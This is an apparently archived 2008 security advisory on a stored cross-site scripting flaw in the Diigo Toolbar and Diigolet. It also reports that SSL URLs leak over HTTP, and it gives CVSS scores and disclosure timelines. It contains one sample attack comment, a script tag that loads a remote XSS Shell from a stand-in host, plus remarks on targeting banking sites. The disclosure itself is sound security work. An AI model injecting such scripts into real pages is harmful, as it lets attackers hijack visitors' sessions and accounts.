Diigo Toolbar - Global XSS and Information Leakage in SSL URLs

2008.06.23
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

Diigo Toolbar - Global XSS and Information Leakage in SSL URLs == Global XSS == Diigo is (http://www.diigo.com/) a social bookmarking and sharing application which allows users to see other users comments and notes for every website. For this feature users should use Diigolet bookmarklet or Diigo Toolbar - http://www.diigo.com/tools. These are almost mandatory to use Diigo and almost all Diigo members have them installed. An attacker can do Cross-site Scripting in these public comments and that comment will affect any other user of Diigo Toolbar and Diigolet who visits the website. This means a Diigo user can backdoor any website in the internet easily with a permanent XSS and any other Diigo user who visits this website will be affected. Vulnerability exists in: * Diigo Toolbar for IE, * Diigo Toolbar for FF, * Diigolet for IE and FF, These comments will be injected into the current domain context, thus an attacker can execute a Javascript code in the target domain, Target URL can be over SSL as well. All Diigo tools users are affected from this vulnerability. For an attacker this is a perfect opportunity to use some XSS bot manager application such as XSS Shell, Also an attacker can attack high profile websites such as online banking applications. Considering you can search in shared bookmarks so you can actually people who uses a certain online banking application. Sample attack comment can be: <script src="http://example.com/xssshell/"></script> == Fix == Download latest version of Diigo Toolbar == Disclosure Timeline == * 12 May 2008 - Vendor Informed * 2 June 2008 - Another e-mail to vendor to check if they've fixed * 3 June 2008 - Vendor informed me that it's fixed * 20 June 2008 - Public Release == Information Leakage in SSL URLs == Diigo toolbar is sending all SSL URLs to their servers over HTTP for shared comment feature, which might cause to leak session_ids over URL or any other sensitive information transferred over URL. == Fix == User can not opt-out from this feature. There is no known fix, this looks like considered as a feature not a bug. == Disclosure Timeline == * 9 May 2008 - Vendor Informed, Couple of mail exchanged and I tried to explain why this is bad, it didn't work. * 12 May 2008 - Ask for an update, No response. * 20 June 2008 - Public Release

References:

http://xforce.iss.net/xforce/xfdb/43301
http://www.securityfocus.com/bid/29611
http://www.securityfocus.com/archive/1/archive/1/493531/100/0/threaded


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top